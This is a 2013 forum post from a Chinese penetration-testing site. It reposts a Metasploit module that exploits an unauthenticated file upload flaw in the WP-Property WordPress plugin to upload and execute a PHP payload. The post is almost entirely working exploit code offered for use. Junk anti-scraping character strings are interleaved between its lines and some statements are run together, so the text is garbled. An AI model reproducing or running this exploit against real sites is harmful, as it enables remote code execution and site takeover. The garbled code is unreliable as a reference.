中国网络渗透测试联盟
标题:
WordPress WP-Property PHP 文件上传漏洞
[打印本页]
作者:
admin
时间:
2013-1-4 19:51
标题:
WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞
& ~$ X4 r' l9 R2 }1 v d& x# {5 `4 k
) F; J- q [ m T: ]9 {
## # This file is part of the Metasploit Framework and may be subject to
, P+ G& C6 E" {9 P, J9 w
+ O4 P6 z5 l2 C
# redistribution and commercial restrictions. Please see the Metasploit
/ B' A$ @1 C' P/ O* o, n
e- F8 u0 k" ^% l% D2 J1 g
# Framework web site for more information on licensing and terms of use.
4 c8 n4 e8 J% o) F! ?' [
. M! G! X9 q9 o8 l
#
http://metasploit.com/framework/
##
9 {& u3 c9 }, r" U% r$ f
* j6 ?* Q$ H. s5 }8 @
/ y. f ~$ d3 V/ X, v/ |& l
- Y8 N( R0 X. s6 }
g0 ^) ^, d. m, m$ L; Z: c7 {
4 w: ?3 O& A$ u7 E/ _
require 'msf/core'
8 t) O, }3 a$ a/ o: x. p. ?
require 'msf/core/exploit/php_exe'
1 X- J" e" t4 g2 t
# U2 T) b* Z8 \' Z
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:
hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
- f% a0 {( V2 q* T
'Description' => %q{
' a# M5 D# F& U' ]9 P
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
1 v' _8 O8 h! S+ v8 C' L. z/ X+ M) o
[
: x5 R4 }- o: L7 J8 g$ y
'Sammy FORGIT', # initial discovery
6 \. _% m" G( j N& r9 k: J( H
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
4 M% N3 C5 V: r# I
],
% y# q7 L% v, a$ `8 U/ Q
'License' => MSF_LICENSE,
- V9 n0 x2 f1 {5 z+ I
'References' =>
7 Y2 C, \1 @5 ~. b' C
[
( `1 g( D, a& {7 F1 @* W* A6 x
[ 'OSVDB', '82656' ],
7 I$ O. n0 _$ ?8 f" J/ \3 R* C* }, }
[ 'BID', '53787' ],
2 |- j7 k+ u& E" b
[ 'EDB', '18987'],
( `9 E! E2 S# j: e& u# j
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
+ y$ |( w+ x M- y
],
6 K. I( i' F: N8 G8 [
'Payload' =>
0 p- k& U: R: M9 u# G
{
6 M4 o& {5 U6 A; {: ~
'BadChars' => "\x00",
$ X3 H* b$ `) Y1 v# a1 m' {3 W
},
a8 y9 ]% T; L/ ?/ r4 q
'Platform' => 'php',
! ~" T* E1 u9 ]
'Arch' => ARCH_PHP,
$ `- ]! N6 \& d( O
'Targets' =>
9 t0 {2 a* t- k( D4 t" P
[
/ R M1 M2 O8 V+ D) y
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 \. G( ?" ~6 W
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
# G/ p9 n( F( y, ^! a2 C( M* o
],
: {, K O' J9 |7 E, U2 C# ^
'DefaultTarget' => 0,
/ K2 y' B1 j4 r$ D9 {: @* R
'DisclosureDate' => 'Mar 26 2012'))
# k. U& B5 Y& S
Q( C3 j4 w- ?& L/ V
register_options(
: B! L+ @- I6 z+ i" N) W
[
% e) Y6 D5 [7 K7 u, H! [2 C
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
1 C* c& A& N- J" {
], self.class)
& J/ {$ I# Q1 _ t) v( }
end
; X$ x; W5 l! q' E' X3 o
$ t0 z3 A$ l9 J, @
def check
' o* v. H5 K c, I: @9 ]
uri = target_uri.path
9 m: T- o: J9 ^& w: h
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
) E. q6 B# W, I
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
6 W: y5 W* y/ C$ v, y5 g0 n: b: A
})
- n) u" J. }, B, ^ S# [
2 W& T, Q4 j' b; {' S( ^
if not res or res.code != 200
8 ] Q n9 i' O" k
return Exploit::CheckCode::Unknown
6 o% a; G$ F9 s2 b
end
5 Q. `9 ?+ n" e ]0 |& r/ {% Q$ S
& o/ s. B- n4 I# s: t
return Exploit::CheckCode::Appears
% q: f0 K, D+ J. [1 f$ g3 ?; ^
end
* S- ^+ T- D3 N$ T4 i& L
5 @0 ?/ F; Y1 C- v F6 K
def exploit
- q* \7 `9 \. |( W" @
uri = target_uri.path
$ q) N) E" j% [+ o& s# Q) G
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
( E5 p2 z+ O2 E; t) D, i
" y+ v j5 \# i( e- h ^
data = Rex::MIME::Message.new
5 h0 D5 ]( B( f' L# ^4 f
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
% z! Y2 y. ^+ b }
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
8 O& X. o$ }' _% t
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
: ]: E5 n3 t, V% G
* ] J$ {: S3 W! ~5 X
print_status("#{peer} - Uploading payload #{@payload_name}")
0 O* z9 N( H' y& b- }
res = send_request_cgi({
* [+ N% Z; P) o# e6 t# X Z
'method' => 'POST',
) [6 p. v" V9 R: m4 P* H
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
; M, Q: F" @0 {2 c/ G
'ctype' => "multipart/form-data; boundary=#{data.bound}",
9 _2 S$ W3 }$ W" K' D1 `( X5 G: @
'data' => post_data
6 X# ?* V* g. B9 t/ d
})
, ^; H* ?# V' ]
& G \1 s3 Y- c7 Z
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
& h8 M, K! r' I) W$ K A1 c# `
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
, L, t( Q) ]- J6 h3 F6 `( G' Y
end
7 b0 Z4 H4 \; y
6 n# e( q1 Z0 W* _
upload_uri = res.body
$ V0 ?# B, C0 t
' K& t7 W; V9 N( D2 x, t- ~
print_status("#{peer} - Executing payload #{@payload_name}")
5 N( }4 m( p+ b$ _
res = send_request_raw({
2 \" r; h, V2 E; }4 o
'uri' => upload_uri,
9 j( g0 ^9 B l) @, Z) d/ N# F
'method' => 'GET'
7 P* Q1 |+ ^0 A, S3 H
})
8 B' ^1 f# y; g1 B! ?8 Y
end
" k+ {: G$ ~- s3 Q" _1 P4 h
end
% Q' a6 _. ~* X- |, Z
2 k* [8 G9 J8 E
不要问我这写的是什么 怎么利用 我是说msf.
+ ~% F3 A$ ^& _
$ Q% \! s* t/ t' G# P% f
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2